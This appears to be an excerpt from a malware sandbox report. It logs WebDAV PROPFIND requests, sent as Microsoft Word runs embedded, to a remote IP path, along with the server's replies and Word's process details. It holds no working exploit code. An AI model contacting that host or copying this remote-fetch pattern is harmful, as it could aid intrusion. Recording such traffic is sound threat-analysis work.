    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>405 Method Not Allowed</title></head><body><h1>Method Not Allowed</h1><p>The requested method PROPFIND is not allowed for this URL.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at 87.120.84.38 Port 80</address></body></html>
    Oct 21, 2024 13:27:39.913047075 CEST  529  IN  HTTP/1.1 301 Moved Permanently
    Server: nginx/1.26.2
    Date: Mon, 21 Oct 2024 11:27:39 GMT
    Content-Type: text/html; charset=iso-8859-1
    Content-Length: 310
    Connection: keep-alive
    Location: http://87.120.84.38/txt/
    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="http://87.120.84.38/txt/">here</a>.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at 87.120.84.38 Port 80</address></body></html>
    Oct 21, 2024 13:27:39.914808989 CEST163OUTData Raw: 50 52 4f 50 46 49 4e 44 20 2f 74 78 74 2f 20 48 54 54 50 2f 31 2e 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 69 63 72 6f 73 6f 66 74 2d 57 65 62 44 41 56 2d 4d 69 6e 69
    Data Ascii: PROPFIND /txt/ HTTP/1.1Connection: Keep-AliveUser-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601Depth: 0translate: fContent-Length: 0Host: 87.120.84.38
    Oct 21, 2024 13:27:40.211926937 CEST517INHTTP/1.1 405 Method Not Allowed
    Server: nginx/1.26.2
    Date: Mon, 21 Oct 2024 11:27:40 GMT
    Content-Type: text/html; charset=iso-8859-1
    Content-Length: 303
    Connection: keep-alive
    Allow: POST,OPTIONS,HEAD,GET
    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 35 20 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 6d 65 74 68 6f 64 20 50 52 4f 50 46 49 4e 44 20 69 73 20 6e 6f 74 20 61 6c 6c 6f 77 65 64 20 66 6f 72 20 74 68 69 73 20 55 52 4c 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 38 37 2e 31 32 30 2e 38 34 2e 33 38 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>405 Method Not Allowed</title></head><body><h1>Method Not Allowed</h1><p>The requested method PROPFIND is not allowed for this URL.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at 87.120.84.38 Port 80</address></body></html>



    Target ID:0
    Start time:07:27:29
    Start date:21/10/2024
    Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    Wow64 process (32bit):false
    Commandline:"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
    Imagebase:0x13f8a0000
    File size:1'423'704 bytes
    MD5 hash:9EE74859D22DAE61F1750B3A1BACB6F5
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:high
    Has exited:false

    No disassembly